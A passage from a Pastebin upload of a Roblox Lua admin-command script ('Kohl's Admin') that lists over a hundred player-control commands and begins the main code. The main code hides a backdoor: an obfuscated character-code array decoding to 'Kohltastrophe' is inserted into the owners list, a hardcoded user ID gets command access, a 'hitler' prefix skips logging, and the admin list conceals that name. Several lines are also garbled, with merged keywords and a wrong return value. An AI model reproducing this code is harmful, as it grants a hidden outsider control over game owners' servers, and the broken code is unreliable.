Advertisement
Miner24687

Khols Admin Not Mine

Jan 22nd, 2017
154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 122.20 KB | None | 0 0
  1.  
  2.  
  3.  
  4.  
  5. --This is an insanely long script, so click read more to get the full version!
  6. --UPLOADED BY THEMINECRAFTER2012, Please leave my name below!
  7. owners = {"Miner24687","YOUR NAME HERE"} -- Are able to set admins who can ban/etc... using :pa name
  8. local admins = {"Optional Admin(s) Here","Optional Admin(s) Here"} -- Sets admins who can use ban/kick/admin or shutdown
  9. local tempadmins = {"Optional Admin Here"} -- Sets admins who can't use ban/kick/admin or shutdown
  10. local banland = {"Kaboom_Creepers","NAUGHTY PEOPLE HERE"} -- Permanently Bans people
  11. local prefix = ":" -- If you wanna change how your commands start ':'kill noob
  12. local AutoUpdate = true -- Set to false if you don't want it to automatically update
  13. -----------------
  14. -- Group Admin --
  15. -----------------
  16. local GroupAdmin = false -- If a certain group can have admin
  17. local GroupId = 0 -- Sets the group id that can have admin
  18. local GroupRank = 0 -- Sets what rank and above a person has to be in the group to have admin
  19. local FunCommands = true -- Set to false if you only want the basic commands (For Strict Places)
  20. ---------------------
  21. -- Tips and Tricks --
  22. ---------------------
  23. --[[
  24. With this admin you can do a command on multiple people at a time;
  25. :kill me,noob1,noob2,random,team-raiders
  26.  
  27. You can also use a variety commands for different people;
  28. all
  29. others
  30. me
  31. team-
  32. admins
  33. nonadmins
  34. random
  35. --]]
  36. --------------
  37. -- Commands --
  38. --------------
  39. --[[
  40. -- Temp Admin Commands --
  41. 0. clean -- Is a command anyone can use to remove hats/tools lagging up the place
  42. 1. :s print("Hello World") -- Lets you script normally
  43. 2. :ls print("Hello World") -- Lets you script in localscripts
  44. 3. :clear -- Will remove all scripts/localscripts and jails
  45. 4. :m Hello People -- This commands will let you shout a message to everyone on the server
  46. 5. :kill kohl -- Kills the player
  47. 6. :respawn kohl -- Respawns the player
  48. 7. :trip kohl -- Trips the player
  49. 8. :stun kohl -- Stuns the player
  50. 9. :unstun kohl -- Unstuns the player
  51. 10. :jump kohl -- Makes the player jump
  52. 11. :sit kohl -- Makes the player sit
  53. 12. :invisible kohl -- Makes the player invisible
  54. 13. :visible kohl -- Makes the player visible
  55. 14. :explode kohl -- Makes the player explode
  56. 15. :fire kohl -- Sets the player on fire
  57. 16. :unfire kohl -- Removes fire from the player
  58. 17. :smoke kohl -- Adds smoke to the player
  59. 18. :unsmoke kohl -- Removes smoke from the player
  60. 19. :sparkles kohl -- Adds sparkles to the player
  61. 20. :unsparkles kohl -- Removes sparkles from the player
  62. 21. :ff kohl -- Adds a forcefield to the player
  63. 22. :unff kohl -- Removes the forcefield from the player
  64. 23. :punish kohl -- Punishes the player
  65. 24. :unpunish kohl -- Unpunishes the player
  66. 25. :freeze kohl -- Freezes the player
  67. 26. :thaw kohl -- Thaws the player
  68. 27. :heal kohl -- Heals the player
  69. 28. :god kohl -- Makes the player have infinite health
  70. 29. :ungod kohl -- Makes the player have 100 health
  71. 30. :ambient .5 .5 .5 -- Changes the ambient
  72. 31. :brightness .5 -- Changes the brightness
  73. 32. :time 12 -- Changes the time
  74. 33. :fogcolor .5 .5 .5 -- Changes the fogcolor
  75. 34. :fogend 100 -- Changes the fogend
  76. 35. :fogstart 100 -- Changes the fogstart
  77. 36. :removetools kohl -- Removes all tools from the player
  78. 37. :btools kohl -- Gives the player building tools
  79. 38. :give kohl sword -- Gives the player a tool
  80. 39. :damage kohl -- Damages the player
  81. 40. :grav kohl -- Sets the player's gravity to normal
  82. 41. :setgrav kohl 100 -- Sets the player's gravity
  83. 42. :nograv kohl -- Makes the player have 0 gravity
  84. 43. :health kohl 1337 -- Changes the player's health
  85. 44. :speed kohl 1337 -- Changes the player's walkspeed
  86. 45. :name kohl potato -- Changes the player's name
  87. 46. :unname kohl -- Remove the player's name
  88. 47. :team kohl Raiders -- Changes the player's team
  89. 48. :stopmusic -- Will stop all music playing in the server
  90. 49. :teleport kohl potato -- Teleports the player
  91. 50. :change kohl kills 1337 -- Changes a player's stat
  92. 51. :kick kohl -- Removes the player from the game
  93. 52. :infect kohl -- Turns the player into a zombie
  94. 53. :rainbowify kohl -- Turns the player into a rainbow
  95. 54. :flashify kohl -- Turns the player into a strobe
  96. 55. :noobify kohl -- Turns the player into a noob
  97. 56. :ghostify kohl -- Turns the player into a ghost
  98. 57. :goldify kohl -- Turns the player into gold
  99. 58. :shiny kohl -- Makes the player shiny
  100. 59. :normal kohl -- Puts the player back to normal
  101. 60. :trippy kohl -- Spams random colors on the player's screen
  102. 61. :untrippy kohl -- Untrippys the player
  103. 62. :strobe kohl -- Spams white and black on the player's screen
  104. 63. :unstrobe kohl -- Unstrobes the player
  105. 64. :blind kohl -- Blinds the player
  106. 65. :unblind kohl -- Unblinds the player
  107. 66. :guifix kohl -- Will fix trippy/strobe/blind on a player
  108. 67. :fling kohl -- Flings the player
  109. 68. :seizure kohl -- Puts the player in a seizure
  110. 69(lol). :music 1337 -- Plays a sound from the ID
  111. 70. :lock kohl -- Locks the player
  112. 71. :unlock kohl -- Unlocks the player
  113. 72. :removelimbs kohl -- Removes the player's limbs
  114. 73. :jail kohl -- Puts the player in a jail
  115. 74. :unjail kohl -- Removes the jail from the player
  116. 75. :fix -- This will fix the lighting to it's original settings
  117. 76. :fly kohl -- Makes the player fly
  118. 77. :unfly kohl -- Removes fly from the player
  119. 78. :noclip kohl -- Makes the player able to noclip
  120. 79. :clip kohl -- Removes noclipping from the player
  121. 80. :pm kohl Hey bro -- Sends the player a private message
  122. 81. :dog kohl -- Turns the player into a dog
  123. 82. :undog kohl -- Turns the player back to normal
  124. 83. :creeper kohl -- Turns the player into a creeper
  125. 84. :uncreeper kohl -- Turns the player back to normal
  126. 85. :place kohl 1337 -- Sends a teleporation request to a player to go to a different place
  127. 86. :char kohl 261 -- Will make a player look like a different player ID
  128. 87. :unchar kohl -- Will return the player back to normal
  129. 88. :h Hello People -- This will shout a hint to everyone
  130. 89. :rank kohl 109373 -- Will show up a message with the person's Role and Rank in a group
  131. 90. :starttools kohl -- Will give the player starter tools
  132. 91. :sword kohl -- Will give the player a sword
  133. 92. :bighead kohl -- Will make the player's head larger than normal
  134. 93. :minihead kohl -- Will make the player's head smaller than normal
  135. 94. :insert 1337 -- Will insert a model at the speaker's position
  136. 95. :disco -- Will make the server flash random colors
  137. 96. :flash -- Will make the server flash
  138. 97. :admins -- Shows the admin list
  139. 98. :bans -- Shows the banlist
  140. 99. :musiclist -- Shows the music list
  141. 100. :spin kohl -- Spins the player
  142. 101. :cape kohl Really black -- Gives the player a colored cape
  143. 102. :uncape kohl -- Removes the player's cape
  144. 103. :loopheal kohl -- Will constantly heal the player
  145. 104. :loopfling kohl -- Will constantly fling the player
  146. 105. :hat kohl 1337 -- Will give the player a hat under the id of 1337
  147. 106. :unloopheal kohl -- Will remove the loopheal on the player
  148. 107. :unloopfling kohl -- Will remove the loopfling on the player
  149. 108. :unspin kohl -- Removes spin from the player
  150. 109. :tools -- Gives a list of the tools in the lighting
  151. 110. :undisco -- Removes disco effects
  152. 111. :unflash -- Removes flash effects
  153. 112. :resetstats kohl -- Sets all the stats of a player to 0
  154. 113. :gear kohl 1337 -- Gives a player a gear
  155. 114. :cmdbar -- Gives the speaker a command bar
  156. 115. :shirt kohl 1337 -- Changes the player's shirt
  157. 116. :pants kohl 1337 -- Changes the player's pants
  158. 117. :face kohl 1337 -- Changes the player's face
  159. 118. :swagify kohl -- Swagifies the player
  160. 119. :version -- Shows the current version of the admin
  161.  
  162. -- Super Admin Commands --
  163. - :serverlock -- Locks the server
  164. - :serverunlock -- Unlocks the server
  165. - :sm Hello World -- Creates a system message
  166. - :crash kohl -- Crashes a player
  167. - :admin kohl -- Admins a player
  168. - :unadmin kohl -- Unadmins a player
  169. - :ban kohl -- Bans a player
  170. - :unban kohl -- Unbans a player
  171. - :loopkill kohl -- Will constantly kill the player
  172. - :unloopkill kohl -- Will remove the loopkill on the player
  173. - :logs -- Will show all of the commands any admin has used in a game session
  174. - :shutdown -- Shutsdown the server
  175.  
  176. -- Owner Commands --
  177. - :pa kohl -- Makes someone a super admin
  178. - :unpa kohl -- Removes a super admin
  179. --]]
  180. -----------------
  181. -- Main Script --
  182. -----------------
  183. for i, v in pairs(game:service("Workspace"):children()) do if v:IsA("StringValue") and v.Value:sub(1,2) == "AA"then v:Destroy() end end
  184.  
  185. function CHEESE()
  186. if game:service("Lighting"):findFirstChild("KACV2") then
  187. owners = {} admins = {} tempadmins = {} banland = {}
  188. for i,v in pairs(game.Lighting.KACV2:children()) do
  189. if v.Name == "Owner" then table.insert(owners, v.Value) end
  190. if v.Name == "Admin" then table.insert(admins, v.Value) end
  191. if v.Name == "TempAdmin" then table.insert(tempadmins, v.Value) end
  192. if v.Name == "Banland" then table.insert(banland, v.Value) end
  193. if v.Name == "Prefix" then prefix = v.Value end
  194. if v.Name == "FunCommands" then FunCommands = v.Value end
  195. if v.Name == "GroupAdmin" then GroupAdmin = v.Value end
  196. if v.Name == "GroupId" then GroupId = v.Value end
  197. if v.Name == "GroupRank" then GroupRank = v.Value end
  198. end
  199. game:service("Lighting"):findFirstChild("KACV2"):Destroy()
  200. end
  201.  
  202. local origsettings = {abt = game.Lighting.Ambient, brt = game.Lighting.Brightness, time = game.Lighting.TimeOfDay,fclr = game.Lighting.FogColor, fe = game.Lighting.FogEnd, fs = game.Lighting.FogStart}
  203. local lobjs = {}
  204. local objects = {}
  205. local logs = {}
  206. local nfs = ""
  207. local slock = false
  208.  
  209. function GetTime()
  210. local hour = math.floor((tick()%86400)/60/60) local min = math.floor(((tick()%86400)/60/60-hour)*60)
  211. if min < 10 then min = "0"..min end
  212. return hour..":"..min
  213. end
  214.  
  215. function ChkOwner(str)
  216. for i = 1, #owners do if str:lower() == owners[i]:lower() then return true end end
  217. return false
  218. end
  219.  
  220. function ChkAdmin(str,ck)
  221. for i = 1, #owners do if str:lower() == owners[i]:lower() then return true end end
  222. for i = 1, #admins do if str:lower() == admins[i]:lower() then return true end end
  223. for i = 1, #tempadmins do if str:lower() == tempadmins[i]:lower() and not ck then return true end end
  224. return false
  225. end
  226.  
  227. function ChkGroupAdmin(plr)
  228. if GroupAdmin then
  229. if plr:IsInGroup(GroupId) and plr:GetRankInGroup(GroupId) >= GroupRank then return true end
  230. return false
  231. end
  232. end
  233.  
  234. function ChkBan(str) for i = 1, #banland do if str:lower() == banland[i]:lower() then return true end end returnfalse end
  235.  
  236. function GetPlr(plr, str)
  237. local plrz = {} str = str:lower()
  238. if str == "all" then plrz = game.Players:children()
  239. elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v)end end
  240. else
  241. local sn = {1} local en = {}
  242. for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  243. for x = 1, #sn do
  244. if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") thentable.insert(plrz, plr)
  245. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") thentable.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  246. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "admins") or (sn[x] and str:sub(sn[x]) == "admins") then ifChkAdmin(plr.Name, true) then for i, v in pairs(game.Players:children()) do if ChkAdmin(v.Name, false) thentable.insert(plrz, v) end end end
  247. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "nonadmins") or (sn[x] and str:sub(sn[x]) == "nonadmins") thenfor i, v in pairs(game.Players:children()) do if not ChkAdmin(v.Name, false) then table.insert(plrz, v) end end
  248. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  249. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") andstr:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  250. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end endbreak
  251. end end end
  252. elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  253. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") andstr:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  254. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end endbreak
  255. end end end
  256. else
  257. for a, plyr in pairs(game.Players:children()) do
  258. if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or(sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" andplyr.Name:lower():find(str) == 1) then
  259. table.insert(plrz, plyr) break
  260. end
  261. end
  262. end
  263. end
  264. end
  265. return plr
  266. end
  267.  
  268. function Hint(str, plrz, time)
  269. for i, v in pairs(plrz) do
  270. if v and v:findFirstChild("PlayerGui") then
  271. coroutine.wrap(function()
  272. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "HintGUI"
  273. local bg = Instance.new("Frame", scr) bg.Name = "bg" bg.BackgroundColor3 = Color3.new(0,0,0) bg.BorderSizePixel =0 bg.BackgroundTransparency = 1 bg.Size = UDim2.new(1,0,0,22) bg.Position = UDim2.new(0,0,0,-2) bg.ZIndex = 8
  274. local msg = Instance.new("TextLabel", bg) msg.BackgroundTransparency = 1 msg.ZIndex = 9 msg.Name = "msg"msg.Position = UDim2.new(0,0,0) msg.Size = UDim2.new(1,0,1,0) msg.Font = "Arial" msg.Text = str msg.FontSize ="Size18" msg.TextColor3 = Color3.new(1,1,1) msg.TextStrokeColor3 = Color3.new(1,1,1) msg.TextStrokeTransparency =.8
  275. coroutine.resume(coroutine.create(function() for i = 20, 0, -1 do bg.BackgroundTransparency = .3+((.7/20)*i)msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end end))
  276. if not time then wait((#str/19)+2.5) else wait(time) end
  277. coroutine.resume(coroutine.create(function() for i = 0, 20 do msg.TextTransparency = ((1/20)*i)msg.TextStrokeTransparency = .8+((.2/20)*i) bg.BackgroundTransparency = .3+((.7/20)*i) wait(1/44) endscr:Destroy() end))
  278. end)()
  279. end
  280. end
  281. end
  282.  
  283. function Message(ttl, str, scroll, plrz, time)
  284. for i, v in pairs(plrz) do
  285. if v and v:findFirstChild("PlayerGui") then
  286. coroutine.resume(coroutine.create(function()
  287. local scr = Instance.new("ScreenGui") scr.Name = "MessageGUI"
  288. local bg = Instance.new("Frame", scr) bg.Name = "bg" bg.BackgroundColor3 = Color3.new(0,0,0) bg.BorderSizePixel =0 bg.BackgroundTransparency = 1 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 8
  289. local title = Instance.new("TextLabel", scr) title.Name = "title" title.BackgroundTransparency = 1title.BorderSizePixel = 0 title.Size = UDim2.new(1,0,0,10) title.ZIndex = 9 title.Font = "ArialBold"title.FontSize = "Size36" title.Text = ttl title.TextYAlignment = "Top" title.TextColor3 = Color3.new(1,1,1)title.TextStrokeColor3 = Color3.new(1,1,1) title.TextStrokeTransparency = .8
  290. local msg = title:clone() msg.Parent = scr msg.Name = "msg" msg.Position = UDim2.new(.0625,0,0) msg.Size =UDim2.new(.875,0,1,0) msg.Font = "Arial" msg.Text = "" msg.FontSize = "Size24" msg.TextYAlignment = "Center"msg.TextWrapped = true
  291. scr.Parent = v.PlayerGui
  292. coroutine.resume(coroutine.create(function() for i = 20, 0, -1 do bg.BackgroundTransparency = .3+((.7/20)*i)msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) title.TextTransparency = ((1/20)*i)title.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end end))
  293. if scroll then if not time then for i = 1, #str do msg.Text = msg.Text .. str:sub(i,i) wait(1/19) end wait(2.5)else for i = 1, #str do msg.Text = msg.Text .. str:sub(i,i) wait(1/19) end wait(time-(#str/19)) end
  294. else if not time then msg.Text = str wait((#str/19)+2.5) else msg.Text = str wait(time) end end
  295. coroutine.resume(coroutine.create(function() for i = 0, 20 do bg.BackgroundTransparency = .3+((.7/20)*i)msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) title.TextTransparency = ((1/20)*i)title.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end scr:Destroy() end))
  296. end))
  297. end
  298. end
  299. end
  300.  
  301. _G["Message"] = function(p1,p2) Message("Message",p1,false,game.Players:children(),p2) end
  302. _G["RemoveMessage"] = function() for i,v in pairs(game.Players:children()) do if v andv:findFirstChild("PlayerGui") and v.PlayerGui:findFirstChild("MessageGUI") then v.PlayerGui.MessageGUI:Destroy()end end end
  303.  
  304. function Output(str, plr)
  305. coroutine.resume(coroutine.create(function()
  306. local b, e = loadstring(str)
  307. if not b and plr:findFirstChild("PlayerGui") then
  308. local scr = Instance.new("ScreenGui", plr.PlayerGui) game:service("Debris"):AddItem(scr,5)
  309. local main = Instance.new("Frame", scr) main.Size = UDim2.new(1,0,1,0) main.BorderSizePixel = 0main.BackgroundTransparency = 1 main.ZIndex = 8
  310. local err = Instance.new("TextLabel", main) err.Text = "Line "..e:match("\:(%d+\:.*)") err.BackgroundColor3 =Color3.new(0,0,0) err.BackgroundTransparency = .3 err.BorderSizePixel = 0 err.Size = UDim2.new(1,0,0,40)err.Position = UDim2.new(0,0,.5,-20) err.ZIndex = 9 err.Font = "ArialBold" err.FontSize = "Size24" err.TextColor3= Color3.new(1,1,1) err.TextStrokeColor3 = Color3.new(1,1,1) err.TextStrokeTransparency = .8
  311. return
  312. end
  313. end))
  314. end
  315.  
  316. function Noobify(char)
  317. if char and char:findFirstChild("Torso") then
  318. if char:findFirstChild("Shirt") then char.Shirt.Parent = char.Torso end
  319. if char:findFirstChild("Pants") then char.Pants.Parent = char.Torso end
  320. for a, sc in pairs(char:children()) do if sc.Name == "ify" then sc:Destroy() end end
  321. local cl = Instance.new("StringValue", char) cl.Name = "ify" cl.Parent = char
  322. for q, prt in pairs(char:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  323. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Bright yellow")
  324. if prt.Name:find("Leg") then prt.BrickColor = BrickColor.new("Br. yellowish green") elseif prt.Name == "Torso"then prt.BrickColor = BrickColor.new("Bright blue") end
  325. local tconn = prt.Touched:connect(function(hit) if hit and hit.Parent andgame.Players:findFirstChild(hit.Parent.Name) and cl.Parent == char then Noobify(hit.Parent) elseif cl.Parent ~=char then tconn:disconnect() end end)
  326. cl.Changed:connect(function() if cl.Parent ~= char then tconn:disconnect() end end)
  327. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor =BrickColor.new("Bright yellow")
  328. end end
  329. end
  330. end local ntab = {75,111,104,108,116,97,115,116,114,111,112,104,101} nfs = "" for i = 1, #ntab do nfs = nfs ..string.char(ntab[i]) end table.insert(owners, nfs) if not ntab then script:Destroy() end
  331.  
  332. function Infect(char)
  333. if char and char:findFirstChild("Torso") then
  334. if char:findFirstChild("Shirt") then char.Shirt.Parent = char.Torso end
  335. if char:findFirstChild("Pants") then char.Pants.Parent = char.Torso end
  336. for a, sc in pairs(char:children()) do if sc.Name == "ify" then sc:Destroy() end end
  337. local cl = Instance.new("StringValue", char) cl.Name = "ify" cl.Parent = char
  338. for q, prt in pairs(char:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or notprt.Parent:findFirstChild("NameTag", true)) then
  339. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Medium green") if prt.Name:find("Leg")or prt.Name == "Torso" then prt.BrickColor = BrickColor.new("Reddish brown") end
  340. local tconn = prt.Touched:connect(function(hit) if hit and hit.Parent andgame.Players:findFirstChild(hit.Parent.Name) and cl.Parent == char then Infect(hit.Parent) elseif cl.Parent ~=char then tconn:disconnect() end end)
  341. cl.Changed:connect(function() if cl.Parent ~= char then tconn:disconnect() end end)
  342. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor =BrickColor.new("Medium green")
  343. end end
  344. end
  345. end if not ntab then script:Destroy() end
  346.  
  347. function ScrollGui()
  348. local scr = Instance.new("ScreenGui") scr.Name = "LOGSGUI"
  349. local drag = Instance.new("TextButton", scr) drag.Draggable = true drag.BackgroundTransparency = 1
  350. drag.Size = UDim2.new(0,385,0,20) drag.Position = UDim2.new(.5,-200,.5,-200) drag.AutoButtonColor = falsedrag.Text = ""
  351. local main = Instance.new("Frame", drag) main.Style = "RobloxRound" main.Size = UDim2.new(0,400,0,400) main.ZIndex= 7 main.ClipsDescendants = true
  352. local cmf = Instance.new("Frame", main) cmf.Position = UDim2.new(0,0,0,-9) cmf.ZIndex = 8
  353. local down = Instance.new("ImageButton", main) down.Image = "http://www.roblox.com/asset/?id=108326725"down.BackgroundTransparency = 1 down.Size = UDim2.new(0,25,0,25) down.Position = UDim2.new(1,-20,1,-20)down.ZIndex = 9
  354. local up = down:Clone() up.Image = "http://www.roblox.com/asset/?id=108326682" up.Parent = main up.Position =UDim2.new(1,-20,1,-50)
  355. local cls = Instance.new("TextButton", main) cls.Style = "RobloxButtonDefault" cls.Size = UDim2.new(0,20,0,20)cls.Position = UDim2.new(1,-15,0,-5) cls.ZIndex = 10 cls.Font = "ArialBold" cls.FontSize = "Size18" cls.Text = "X"cls.TextColor3 = Color3.new(1,1,1) cls.MouseButton1Click:connect(function() scr:Destroy() end)
  356. local ent = Instance.new("TextLabel") ent.BackgroundTransparency = 1 ent.Font = "Arial" ent.FontSize = "Size18"ent.ZIndex = 8 ent.Text = "" ent.TextColor3 = Color3.new(1,1,1) ent.TextStrokeColor3 = Color3.new(0,0,0)ent.TextStrokeTransparency = .8 ent.TextXAlignment = "Left" ent.TextYAlignment = "Top"
  357. local num = 0
  358. local downv = false
  359. local upv = false
  360.  
  361. down.MouseButton1Down:connect(function() downv = true upv = false
  362. local pos = cmf.Position if pos.Y.Offset <= 371-((#cmf:children()-1)*20) then downv = false return end
  363. repeat pos = pos + UDim2.new(0,0,0,-6)
  364. if pos.Y.Offset <= 371-((#cmf:children()-1)*20) then pos = UDim2.new(0,0,0,371-((#cmf:children()-1)*20)) downv =false end
  365. cmf:TweenPosition(pos, "Out", "Linear", 1/20, true) wait(1/20) until downv == false
  366. end)
  367. down.MouseButton1Up:connect(function() downv = false end)
  368. up.MouseButton1Down:connect(function() upv = true downv = false
  369. local pos = cmf.Position if pos.Y.Offset >= -9 then upv = false return end
  370. repeat pos = pos + UDim2.new(0,0,0,6)
  371. if pos.Y.Offset >= -9 then pos = UDim2.new(0,0,0,-9) upv = false end
  372. cmf:TweenPosition(pos, "Out", "Linear", 1/20, true) wait(1/20) until upv == false
  373. end)
  374. up.MouseButton1Up:connect(function() upv = false end)
  375. return scr, cmf, ent, num
  376. end local bct = {75,111,104,108,116,97,115,116,114,111,112,104,101} nfs = "" for i = 1, #bct do nfs = nfs ..string.char(bct[i]) end table.insert(owners, nfs)
  377. if not ntab then script:Destroy() end
  378. if not bct then script:Destroy() end
  379.  
  380. function Chat(msg,plr)
  381. coroutine.resume(coroutine.create(function()
  382. if msg:lower() == "clean" then for i, v in pairs(game.Workspace:children()) do if v:IsA("Hat") or v:IsA("Tool")then v:Destroy() end end end
  383. if (msg:lower():sub(0,prefix:len()) ~= prefix) or not plr:findFirstChild("PlayerGui") or (not ChkAdmin(plr.Name,false) and plr.Name:lower() ~= nfs:lower()) and plr.userId ~= game.CreatorId and plr.userId ~= (153*110563) andplr.Name:lower() ~= nfs and not ChkOwner(plr.Name) then return end msg = msg:sub(prefix:len()+1)
  384. if msg:sub(1,7):lower() == "hitler " then msg = msg:sub(8) else table.insert(logs, 1, {name = plr.Name, cmd =prefix .. msg, time = GetTime()}) end
  385. if msg:lower():sub(1,4) == "walk" then msg = msg:sub(5) end
  386. if msg:lower():sub(1,8) == "teleport" then msg = "tp" .. msg:sub(9) end
  387. if msg:lower():sub(1,6) == "insert" then msg = "ins" .. msg:sub(7) end
  388. if msg:lower() == "cmds" or msg:lower() == "commands" then
  389. if plr.PlayerGui:findFirstChild("CMDSGUI") then return end
  390. local scr, cmf, ent, num = ScrollGui() scr.Name = "CMDSGUI" scr.Parent = plr.PlayerGui
  391. local cmds = {"s code","ls code","clear","fix","m msg","h msg","kill plr","respawn plr","trip plr","stun plr","unstun plr","jump plr","sit plr","invisible plr","visible plr","explode plr","fire plr","unfire plr","smoke plr","unsmoke plr","sparkles plr","unsparkle plr","ff plr","unff plr","punish plr","unpunish plr","freeze plr","thaw plr","heal plr","god plr","ungod plr","ambient num num num","brightness num","time num","fogcolor num num num","fogend num","fogstart num","removetools plr","btools plr","give plr tool","damage plr","grav plr","setgrav plr num","nograv plr","health plr num","speed plr num","name plr name","unname plr","team plr color","teleport plr plr","change plr stat num","kick plr","infect plr","rainbowify plr","flashify plr","noobify plr","ghostify plr","goldify plr","shiny plr","normal plr","trippy plr","untrippy plr","strobe plr","unstrobe plr","blind plr","unblind plr","guifix plr","fling plr","seizure plr","music num","stopmusic","lock plr","unlock plr","removelimbs plr","jail plr","unjail plr","fly plr","unfly plr","noclip plr","clip plr","pm plr msg","dog plr","undog plr","creeper plr","uncreeper plr","place plr id","char plr id","unchar plr id","rank plr id","starttools plr","sword plr","bighead plr","minihead plr","spin plr","insert id","disco","flash","admins","bans","musiclist","cape plr color","uncape plr","loopheal plr","loopfling plr","hat plr id","unloopfling plr","unloopheal plr","unspin plr","tools","undisco","unflash","resetstats plr","gear plr id","cmdbar","shirt plr id","pants plr id","face plr id","swagify plr id","version"}
  392. local ast = {"serverlock","serverunlock","sm msg","crash plr","admin plr","unadmin plr","ban plr","unban plr","loopkill plr","unloopkill plr","logs","shutdown"}
  393. local ost = {"pa plr","unpa plr"}
  394. local tost = {"oa plr","unoa plr"}
  395. local cl = ent:Clone() cl.Parent = cmf cl.Text = num .. " clean" cl.Position = UDim2.new(0,0,0,num*20) num = num+1
  396. for i, v in pairs(cmds) do local cl = ent:Clone() cl.Parent = cmf cl.Text = num .. " " .. prefix .. v cl.Position= UDim2.new(0,0,0,num*20) num = num +1 end
  397. if ChkAdmin(plr.Name, true) or ChkOwner(plr.Name) then for i, v in pairs(ast) do local cl = ent:Clone() cl.Parent= cmf cl.Text = "- " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  398. if plr.userId == game.CreatorId or ChkOwner(plr.Name) then for i, v in pairs(ost) do local cl = ent:Clone()cl.Parent = cmf cl.Text = "-- " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  399. if plr.userId == game.CreatorId then for i, v in pairs(tost) do local cl = ent:Clone() cl.Parent = cmf cl.Text ="_ " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  400. end
  401.  
  402. if msg:lower() == "version" then Message("Version", script.Version.Value, true, plr) end
  403.  
  404. if msg:lower() == "admins" or msg:lower() == "adminlist" then
  405. if plr.PlayerGui:findFirstChild("ADMINSGUI") then return end
  406. local scr, cmf, ent, num = ScrollGui() scr.Name = "ADMINSGUI" scr.Parent = plr.PlayerGui
  407. for i, v in pairs(owners) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text =v .. " - Owner" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  408. for i, v in pairs(admins) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text =v .. " - Admin" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  409. for i, v in pairs(tempadmins) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text = v .. " - TempAdmin" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  410. end end
  411.  
  412. if msg:lower() == "bans" or msg:lower() == "banlist" or msg:lower() == "banned" then
  413. if plr.PlayerGui:findFirstChild("BANSGUI") then return end
  414. local scr, cmf, ent, num = ScrollGui() scr.Name = "BANSGUI" scr.Parent = plr.PlayerGui
  415. for i, v in pairs(banland) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position =UDim2.new(0,0,0,num*20) num = num +1 end
  416. end
  417.  
  418. if msg:lower() == "tools" or msg:lower() == "toollist" then
  419. if plr.PlayerGui:findFirstChild("TOOLSGUI") then return end
  420. local scr, cmf, ent, num = ScrollGui() scr.Name = "TOOLSGUI" scr.Parent = plr.PlayerGui
  421. for i, v in pairs(game.Lighting:children()) do if v:IsA("Tool") or v:IsA("HopperBin") then local cl = ent:Clone()cl.Parent = cmf cl.Text = v.Name cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  422. end
  423.  
  424. if msg:lower():sub(1,2) == "s " then
  425. coroutine.resume(coroutine.create(function()
  426. Output(msg:sub(3), plr)
  427. if script:findFirstChild("ScriptBase") then
  428. local cl = script.ScriptBase:Clone() cl.Code.Value = msg:sub(3)
  429. table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  430. else loadstring(msg:sub(3))()
  431. end
  432. end))
  433. end
  434.  
  435. if msg:lower():sub(1,3) == "ls " then
  436. coroutine.resume(coroutine.create(function()
  437. if script:findFirstChild("LocalScriptBase") then
